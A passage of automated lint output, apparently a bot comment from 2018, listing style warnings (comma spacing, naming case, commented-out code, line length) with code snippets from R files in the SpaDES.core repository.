*style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/85bed0cd9ea8fcc68ce022ae5d7a00ebbe1e3755/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T06:45:05Z"}
